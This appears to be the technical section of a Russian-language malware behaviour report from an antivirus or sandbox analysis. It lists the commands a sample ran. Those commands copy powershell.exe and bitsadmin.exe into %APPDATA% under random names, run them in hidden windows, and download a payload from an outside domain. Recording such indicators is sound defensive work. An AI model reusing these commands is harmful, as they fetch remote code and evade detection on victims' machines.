Техническая информация
- '%APPDATA%\zxexoee.exe' /transfer PDZwrq /download https://elyalconsult.com/consora/08380360969/map.css %APPDATA%\map.css
- %APPDATA%\pzxexoee.exe
- %APPDATA%\zxexoee.exe
- DNS ASK el####onsult.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\pzXexoEe.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\zXexoEe.exe' (со скрытым окном)
- '%APPDATA%\zxexoee.exe' /transfer PDZwrq /download https://elyalconsult.com/consora/08380360969/map.css %APPDATA%\map.css' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\pzXexoEe.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\zXexoEe.exe